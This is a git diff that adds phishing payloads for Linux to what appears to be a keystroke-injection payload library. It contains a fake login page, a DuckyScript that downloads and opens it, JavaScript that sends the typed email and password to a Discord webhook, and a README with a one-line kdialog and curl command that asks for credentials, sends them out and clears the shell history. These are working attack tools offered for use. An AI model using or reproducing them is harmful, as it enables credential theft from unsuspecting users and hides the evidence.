<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
<h2>Special and super secure login</h2>
<form onsubmit="send_login(); return false;" method="post">
<div class="form-group">
<label for="email">Email:</label>
<input type="email" class="form-control" id="email" placeholder="Insert your email">
</div>
<div class="form-group">
<label for="password">Password:</label>
<input type="password" class="form-control" id="password" placeholder="Insert your password">
</div>
<div class="form-check">
<label class="form-check-label">
<input type="checkbox" class="form-check-input"> Remember me
</label>
</div>
<button type="submit" class="btn btn-primary">Login</button>
</form>
</div>
</body>
<script src="script.js"></script>
</html>

51
payloads/library/phishing/StandardPhishingCampaign_Linux/payload.txt Normal file
View File

@ -0,0 +1,51 @@
REM #############################################
REM # |
REM # Title : Standard Phishing Campaign |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Phishing |
REM # Target : Linux |
REM # |
REM #############################################
REM Requirements:
REM - Internet Connection
REM - You own ZIP link
REM - Discord webhook (or whatever you want to use for the exfiltration)
REM - Python
REM - 'ExecutionPolicy Bypass' if used in Windows 10/11
REM REQUIRED - Replace example.com/file.zip with your own ZIP link. The zip should contian the files ['login.html', 'script.js']
DEFINE #ZIP_LINK example.com/file.zip
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Main SECTION ####
REM Create a random directory
STRINGLN dir_name=$(mktemp -d)
DELAY 500
REM Delete the directory after 60 minutes (3600 seconds)
STRINGLN (sleep 3600 && rm -rf $dir_name) &
DELAY 500
REM Move into the directory
STRINGLN cd $dir_name
DELAY 500
REM Download the zip from your own link
STRINGLN curl -LOk "#ZIP_LINK"
DELAY 500
REM Unzip it
STRINGLN unzip file.zip
DELAY 500
REM Open the login page
STRINGLN xdg-open login.html; exit;

33
payloads/library/phishing/StandardPhishingCampaign_Linux/script.js Normal file
View File

@ -0,0 +1,33 @@
async function send_login() {
// SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data
const discord_webhook_url = "https://discord.com/api/webhooks/123/abc";
// Retrieve data from POST form
const email = document.getElementById('email').value;
const password = document.getElementById('password').value;
// Create message content
const message = "Email: " + email + " \n " + "Password: " + password;
try {
// Send POST request to Discord webhook URL
const response = await fetch(discord_webhook_url, {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({ content: message })
});
if (response.ok) {
// DEFINE the redirect link preferred
window.location.href = "https://www.example.com";
} else {
// Otherwise, throw a generic error
throw new Error('Generic error!');
}
} catch (error) {
// Log any errors to the console
console.error(error);
}
}

59
payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/README.md Normal file
View File

@ -0,0 +1,59 @@
# Standard Phishing Payload Using kdialog - Linux ✅
A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog.
**Category**: Phishing
## Description
A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog.
Opens a shell, get the data by a popup, send the input to a Discord webhook (or whatever you want to use for the exfiltration).
## Getting Started
### Dependencies
* Internet Connection for the Exfiltration
### Settings
* Set the Discord webhook
* Set the payload as you want
### cURL Command
With this payload you can send a post message using cURL shell command line to the webhook or whatever you choose for the exfiltration. You should replace the tag *\<message>* with the user input.
- `curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(<message>)\"}" $WEBHOOK_URL);`
### kdialog - Popup command
KDialog can be used to show nice dialog boxes from shell scripts. You can't acquire multiple input in one popup, so you should use multiple popup. You can set the title, the message, the input type and so and so on...
- Simple message popup: `kdialog --title "<replace_with_your_title>" --msgbox "<replace_with_your_message>"; `
- Plaintext input popup (i.e. Username): `kdialog --title "<input_title>" --inputbox "<input_type_title>";`
- Hiddentext input popup (i.e. Password): `kdialog --title "<input_title>" --password "<input_type_title>" --default "password";`
### The Payload
The payload will merge the cURL command with the kdialog popup output (so the user input) as the following command...
```shell
$(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Popup Title" --msgbox "Insert your username and password for go on"; kdialog --title "Insert your Username" --inputbox "Username"; kdialog --title "Insert your Password" --password "Password" --default "password";)\"}" $WEBHOOK_URL);
```
You can put into the payload something that will clear the last shell history closing the shell at the end of the execution, adding this line `history -c; exit;`
```shell
$(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Popup Title" --msgbox "Insert your username and password for go on"; kdialog --title "Insert your Username" --inputbox "Username"; kdialog --title "Insert your Password" --password "Password" --default "password";)\"}" $WEBHOOK_URL); history -c; exit;
```
### FAQs
- Why put the entire payload in one line?
Generally it is recommended to divide the various steps at different times by dividing each command with some DELAY, in this case it is not recommended because phishing-type cyber attacks often tend to take a long time. How can you tell how long a user should take to enter their data? What if he doesn't remember his email? It is important to consider the slow factor, which, in theory, can take really long and in any case cannot be dynamically predicted.
- Why is used the 'cyber-attack' word?
This payload is intended to be a working tool for performing cybersecurity analysis and is not intended to harm malicious users in any way. This term is used for simplicity in speaking but is really meant to be a study tool that can be worked on.

Some files were not shown because too many files have changed in this diff Show More